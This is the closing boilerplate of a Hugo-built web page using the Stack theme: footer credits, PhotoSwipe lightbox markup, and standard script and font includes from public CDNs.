    </section>
    
    <section class="powerby">
        Built with <a href="https://gohugo.io/" target="_blank" rel="noopener">Hugo</a> <br />
        Theme <b><a href="https://github.com/CaiJimmy/hugo-theme-stack" target="_blank" rel="noopener" data-version="2.3.0">Stack</a></b> designed by <a href="https://jimmycai.com" target="_blank" rel="noopener">Jimmy</a>
    </section>
</footer>

    
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    
    <div class="pswp__bg"></div>

    
    <div class="pswp__scroll-wrap">

        
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                
                
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"integrity="sha256-ePwmChbbvXbsO02lbM3HoHbSHTHFAeChekF1xKJdleo="crossorigin="anonymous"
                defer="true"
                >
            </script><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"integrity="sha256-UKkzOn/w1mBxRmLLGrSeyB4e1xbrp4xylgAWb3M42pU="crossorigin="anonymous"
                defer="true"
                >
            </script><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.css"integrity="sha256-c0uckgykQ9v5k&#43;IqViZOZKc47Jn7KQil4/MP3ySA3F8="crossorigin="anonymous"
            ><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.css"integrity="sha256-SBLU4vv6CA6lHsZ1XyTdhyjJxCjPif/TRkjnsyGAGnE="crossorigin="anonymous"
            >

            </main>
        </div>
        <script 
                src="https://cdn.jsdelivr.net/npm/node-vibrant@3.1.5/dist/vibrant.min.js"integrity="sha256-5NovOZc4iwiAWTYIFiIM7DxKUXKWvpVEuMEPLzcm5/g="crossorigin="anonymous"
                defer="false"
                >
            </script><script type="text/javascript" src="/ts/main.js" defer></script>
<script>
    (function () {
        const customFont = document.createElement('link');
        customFont.href = "https://fonts.googleapis.com/css2?family=Lato:wght@300;400;700&display=swap";

        customFont.type = "text/css";
        customFont.rel = "stylesheet";

        document.head.appendChild(customFont);
    }());
</script>

    </body>
</html>
